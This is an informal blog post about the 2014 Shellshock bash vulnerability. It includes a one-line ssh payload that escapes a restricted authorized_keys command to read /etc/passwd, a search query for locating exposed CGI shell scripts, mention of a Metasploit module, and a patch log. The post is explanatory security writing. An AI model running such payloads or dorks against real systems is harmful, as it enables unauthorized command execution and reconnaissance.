My bash story – CVE-2014-6271

CVE-2014-6271 hit the news yesterday, and if your serious about security you have to be on top of everything.
After reading the oss-sec list, I first patched my system (so should you..), and then I left a know vulnerable VM stay in my safe environment to play with. How does it work?, is it as bad as people are saying?.. yes!

Take one scenario;
Your managing a network, and do a lot of maintenance/report jobs via SSH and certificates. of course you have looked down the ability to get an interactive shell, with the use of command=”$SOMECMD”,no-agent-forwarding,no-port-forwarding,no-pty,no-user-rc,no-X11-forwarding in your authorized_keys.

If the $SOMECMD is a bash script, your out of luck…

ssh -o ‘rsaauthentication yes’ remoteuser@remotehost ‘() { ignored; }; cat /etc/passwd’

You can running any cmd, with the same privileges as the remote user. I would say this classifies as en privileges escalation, but you need a “valid” user/session to get this work. So what else has been discussed, well one of my biggest concerns are CGI scripts witch are running some kind of bash code, this would diffidently be a bad scenario. This would work remotely, and with out a valid user…

Google search : filetype:sh inurl:cgi-bin;
About 1,230,000 results (0.38 seconds)

I haven’t tested this yet, but this can be really bad. Maybe as bad has the heartbled. An another concern is, what about embed systems? Your Router, your NAS, your TV…… guess we will see a lot of exploits in the near future. And Metasploit has a valid module already.

Apache mod_cgi Bash Environment Variable Code Injection

This module exploits a code injection in specially crafted environment variables in Bash, specifically targeting Apache mod_cgi scripts through the HTTP_USER_AGENT variable.

 

The good news! The VM I was testing on last night, have automagically  updated it self, looks like Ubuntu has job running every morning that updates criticial packages without you knowing.

2014-09-25 06:29:40 upgrade bash:amd64 4.3-7ubuntu1 4.3-7ubuntu1.1
2014-09-25 06:29:40 status half-configured bash:amd64 4.3-7ubuntu1
2014-09-25 06:29:40 status unpacked bash:amd64 4.3-7ubuntu1
2014-09-25 06:29:40 status half-installed bash:amd64 4.3-7ubuntu1
2014-09-25 06:29:41 status half-installed bash:amd64 4.3-7ubuntu1
2014-09-25 06:29:41 status unpacked bash:amd64 4.3-7ubuntu1.1
2014-09-25 06:29:41 status unpacked bash:amd64 4.3-7ubuntu1.1
2014-09-25 06:29:42 configure bash:amd64 4.3-7ubuntu1.1 <none>
2014-09-25 06:29:42 status unpacked bash:amd64 4.3-7ubuntu1.1
2014-09-25 06:29:42 status unpacked bash:amd64 4.3-7ubuntu1.1
2014-09-25 06:29:42 status unpacked bash:amd64 4.3-7ubuntu1.1
2014-09-25 06:29:42 status unpacked bash:amd64 4.3-7ubuntu1.1
2014-09-25 06:29:42 status unpacked bash:amd64 4.3-7ubuntu1.1
2014-09-25 06:29:42 status half-configured bash:amd64 4.3-7ubuntu1.1
2014-09-25 06:29:42 status installed bash:amd64 4.3-7ubuntu1.1

 

BTW, just came over a cute way of checking your system for this vulnerability. That is, if your running SPLUNK.
Splunk Blogg – ShellShock

Picture "stolen" from Splunk blog...

Picture “stolen” from Splunk blog…

Leave a Comments